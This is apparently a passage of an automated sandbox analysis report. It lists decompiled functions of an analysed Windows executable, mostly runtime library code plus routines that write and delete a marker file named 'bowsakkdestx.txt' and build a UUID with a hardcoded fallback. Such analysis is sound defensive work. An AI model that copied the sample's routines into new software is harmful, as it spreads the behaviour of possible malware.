C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t39 = _t34 + 1;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00437a31
0x00437a36
0x00437a5e
0x00000000
0x00437a8c
0x00437a7e
0x00437aaf
0x00000000
0x00437aaf
0x00000000
0x00437a80
0x00437aad
0x00000000
0x00000000
0x00437ab3
0x00437ab8
0x00437abc
0x00437abc
0x00437a85

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

ACP, xrefs: 00437A3E
OCP, xrefs: 00437A4F

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c470
0x0040c479
0x0040c489
0x0040c48b
0x0040c493
0x0040c4a9
0x0040c4c0
0x0040c4c5
0x0040c4c7
0x0040c4d1
0x0040c4d9
0x0040c4da
0x0040c4dc
0x0040c4dd
0x0040c4e2
0x0040c4e3
0x0040c4f2
0x0040c4c9
0x0040c4ca
0x0040c4d0
0x0040c4d0
0x0040c495
0x0040c49b
0x0040c49b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x00423b4c
0x00423b4c
0x00423b4c
0x00423b61
0x00423b64
0x00423b6c
0x00000000
0x00000000
0x00423b5f
0x00423b72
0x00423b77
0x00423b7f
0x00423b82
0x00423b8f
0x00423b97
0x00423b9c
0x00423ba1
0x00423ba3
0x00423ba9
0x00423bb2
0x00423bb5
0x00423bba
0x00423bbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b5f
0x00423b71
0x00000000

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc = E0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427C2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x423b69
				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
				E00427CEC(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00427E0E(__ebx, __edi, __esi, _t15);
			}

0x00427c2e
0x00427c31
0x00427c36
0x00427c39
0x00427c44
0x00427c49
0x00427c4a
0x00427c4c
0x00427c4e
0x00427c58

APIs

__FF_MSGBANNER.LIBCMT ref: 00427C31

Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82

__NMSG_WRITE.LIBCMT ref: 00427C39

Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

_doexit.LIBCMT ref: 00427C50

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Strings

i;B, xrefs: 00427C36

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
String ID: i;B
API String ID: 2447380256-472376889
Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(0x4caa30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

0x0040ecb3
0x0040ecb5
0x0040ecc0
0x0040ecc1
0x0040ecc8
0x0040eccd
0x0040ecce
0x0040ecd0
0x0040ecd7
0x0040ecd9
0x0040ecdb
0x0040ece3
0x0040ece5
0x0040ece7
0x0040ece9
0x0040ecec
0x0040ecf3
0x0040ecf6
0x0040ecf6
0x0040ecfd
0x0040ed03
0x0040ed44
0x0040ed48
0x0040eefc
0x0040ef00
0x0040ef05
0x0040ef0a
0x0040ef0a
0x0040ef11
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef28
0x0040ef2d
0x0040ef35
0x0040ef40
0x0040ef40
0x0040ed58
0x0040ed60
0x0040ed61
0x0040ed65
0x0040ed66
0x0040ed6b
0x0040ed6d
0x0040ed72
0x00000000
0x00000000
0x0040ed80
0x0040ed83
0x0040ed8a
0x0040ed91
0x0040ed95
0x0040ed9b
0x0040ed9d
0x0040ed9d
0x0040eda0
0x0040eda0
0x0040eda2
0x0040eda3
0x0040eda7
0x0040eda9
0x0040eda9
0x0040edab
0x0040edae
0x0040edb3
0x0040edba
0x0040edbf
0x0040ee58
0x0040ee5b
0x0040ee60
0x0040ee60
0x0040ee65
0x0040ee6a
0x0040ee6c
0x0040ee73
0x0040ee7a
0x0040ee81
0x0040ee9c
0x0040ee9e
0x0040ee83
0x0040ee86
0x0040ee87
0x0040ee8f
0x0040ee94
0x0040ee94
0x0040ee87
0x0040eea8
0x0040eeae
0x0040eeb1
0x0040eeb8
0x0040eebf
0x0040eebf
0x00000000
0x0040ee6a
0x0040edc5
0x0040edc7
0x0040edcc
0x00000000
0x00000000
0x0040edd2
0x0040ede3
0x0040ede8
0x0040eded
0x0040eded
0x0040edf7
0x0040edfa
0x0040edff
0x0040ee05
0x0040ee0c
0x0040ee13
0x0040ee1a
0x0040ee31
0x0040ee33
0x0040ee1c
0x0040ee1f
0x0040ee20
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee20
0x0040ee3c
0x0040ee42
0x0040ee45
0x0040ee4c
0x0040ee53
0x0040ee53
0x00000000
0x0040edff
0x0040ed97
0x00000000
0x0040eec3
0x0040eec3
0x0040eec7
0x0040eecf
0x0040eed4
0x0040eed9
0x0040eed9
0x0040eee3
0x0040eee7
0x0040eee8
0x0040eeea
0x0040eeef
0x0040eef1
0x0040eef4
0x00000000
0x0040ed80
0x0040ed05
0x0040ed09
0x0040ed3b
0x0040ed3c
0x0040ed41
0x00000000
0x0040ed0b
0x0040ed10
0x0040ed14
0x0040ed18
0x0040ed1d
0x0040ed1d
0x0040ed20
0x0040ed27
0x0040ed2e
0x0040ed31
0x0040ed34
0x0040ed38
0x00000000
0x0040ed38

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
